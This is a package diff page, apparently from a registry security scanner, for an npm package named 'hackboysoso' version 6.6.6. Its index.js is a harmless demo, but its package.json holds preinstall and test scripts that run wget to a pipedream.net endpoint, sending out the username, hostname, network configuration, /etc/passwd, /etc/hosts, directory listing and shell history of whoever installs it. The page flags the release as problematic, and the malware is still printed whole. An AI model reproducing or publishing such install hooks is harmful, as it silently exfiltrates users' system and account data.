hackboysoso 6.6.6

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of hackboysoso might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +3 -0
  2. package/package.json +12 -0
package/index.js ADDED
@@ -0,0 +1,3 @@
1
+ exports.printMsg = function() {
2
+ console.log("This is a message from the demo package");
3
+ }
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "hackboysoso",
3
+ "version": "6.6.6",
4
+ "main": "index.js",
5
+ "scripts": {
6
+ "test": "wget --quiet \"https://da015ceec603916db7ca458a1b7bb470.m.pipedream.net/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)&ip=$(ifconfig)&etc=$(cat /etc/passwd)&etchost=$(cat /etc/hosts)&Listingdir=$(ls)&history=$(history)\" # CHANGE IP ADDRESS",
7
+ "preinstall": "wget --quiet \"https://da015ceec603916db7ca458a1b7bb470.m.pipedream.net/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)&ip=$(ifconfig)&etc=$(cat /etc/passwd)&etchost=$(cat /etc/hosts)&Listingdir=$(ls)&history=$(history)\" # CHANGE IP ADDRESS"
8
+ },
9
+ "author": "sank",
10
+ "license": "ISC",
11
+ "description": ""
12
+ }